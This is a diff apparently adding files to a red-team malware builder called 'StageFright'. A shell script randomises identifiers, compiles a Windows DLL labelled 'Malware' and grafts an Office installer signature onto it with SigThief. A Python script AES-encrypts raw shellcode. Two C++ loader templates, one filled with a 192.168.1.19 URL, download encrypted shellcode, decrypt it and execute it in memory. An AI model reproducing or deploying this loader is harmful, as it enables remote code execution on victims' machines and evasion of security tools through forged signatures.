+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/HTTPDLL/Resources/template.cpp -Wno-narrowing -fpermissive -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -lws2_32 -lntdll -lwininet -O2 >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+

StageFright/StageFright/StageFright/HTTPDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/HTTPDLL/Resources/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL gTaJYuusLB(LPCWSTR szUrl, PBYTE* SpgpyXbkF, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *SpgpyXbkF = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int aIgJpBPdrAbA(char* difern, unsigned int difern_len, char* uGORTNsaW, size_t uGORTNsaWlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)uGORTNsaW, (DWORD)uGORTNsaWlen, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char uGORTNsaW[] =  { 0x5d, 0x27, 0x8, 0x17, 0x2c, 0x50, 0x6a, 0x59, 0x91, 0xb, 0xea, 0x8c, 0xe9, 0x99, 0xb8, 0x11 };
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://192.168.1.19:8080/invoice.txt";  // Replace with your actual URL
+
+    PBYTE SpgpyXbkF;
+    SIZE_T SpgpyXbkFSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!gTaJYuusLB(szUrl, &SpgpyXbkF, &SpgpyXbkFSize)) {
+        printf("[!] gTaJYuusLB Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    aIgJpBPdrAbA((char*)SpgpyXbkF, SpgpyXbkFSize, uGORTNsaW, sizeof(uGORTNsaW));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = SpgpyXbkFSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, SpgpyXbkF, SpgpyXbkFSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+

StageFright/StageFright/StageFright/HTTPDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/HTTPDLL/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL Random3(LPCWSTR szUrl, PBYTE* RandomB, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *RandomB = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int Random1(char* difern, unsigned int difern_len, char* Random2, size_t Random2len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)Random2, (DWORD)Random2len, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random2[] = KEYVALUE
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://HOSTIP:PORTY/SHELLCODEFILE";  // Replace with your actual URL
+
+    PBYTE RandomB;
+    SIZE_T RandomBSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!Random3(szUrl, &RandomB, &RandomBSize)) {
+        printf("[!] Random3 Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    Random1((char*)RandomB, RandomBSize, Random2, sizeof(Random2));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = RandomBSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, RandomB, RandomBSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+